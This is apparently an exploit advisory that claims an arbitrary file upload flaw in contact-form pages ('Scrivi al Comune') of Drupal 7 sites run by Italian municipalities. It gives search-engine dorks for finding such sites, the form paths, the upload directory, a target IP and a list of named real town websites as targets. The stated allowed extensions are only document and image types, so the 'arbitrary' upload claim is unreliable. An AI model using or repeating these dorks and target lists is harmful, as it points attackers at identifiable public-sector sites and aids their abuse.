#################################################################################################
# Exploit Title : Drupal 7 jQuery ItalianGov Fi.it Scrivi Al Comune Arbitrary File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 22/06/2018
# Vendor Homepage : regione.toscana.it - jquery.com
# Tested On : Windows
# Version : 7
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-287 [ Improper Authentication ] + CWE-284 [ Improper Access Control ]
#################################################################################################
# Google Dorks :
intext:''Scrivi al Comune'' site:fi.it
Il testo del tuo messaggio * site:fi.it
# Exploits :
/scrivi-al-comune
/scrivi-al-comune-0
/segnalazioni-e-reclami-0
/scrivi-al-sindaco-0
/node/19
# Path : /sites/www.comune.DOMAINADDRESS.fi.it/files/webform/.....
# Note => Allowed File Extensions : gif jpg png tif txt rtf odf pdf doc docx xls xlsx.
# Don't forget to put www. before comune. on the URL Address bar.
#################################################################################################
# Example Sites and Target IP => 159.213.236.225
[ Proof of Concept for Vulnerability and Exploit ] => archive.is/zUN5z - archive.is/3IMxH
comune.vicchio.fi.it/segnalazioni-e-reclami-0
comunebarberino.it/scrivi-al-comune
comune.borgo-san-lorenzo.fi.it/scrivi-al-comune-0
comune.bagno-a-ripoli.fi.it/scrivi-al-sindaco-0
comune.rignano-sullarno.fi.it/scrivi-al-comune
comune.pontassieve.fi.it/scrivi-al-comune-0
comune.marradi.fi.it/scrivi-al-comune
comune.dicomano.fi.it/scrivi-al-comune-0
comune.reggello.fi.it/scrivi-al-comune-0
comune.palazzuolo-sul-senio.fi.it/scrivi-al-comune
comune.scarperiaesanpiero.fi.it/scrivi-al-comune
comune.provagliodiseo.bs.it/node/19
comune.terni.it/scrivi-al-comune
################################################################################################
Reference Topic Link [ It belongs to me ] => cyberizm.org/cyberizm-drupal-7-jquery-italia-fi-it-scrivi-al-comune-exploit.html
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################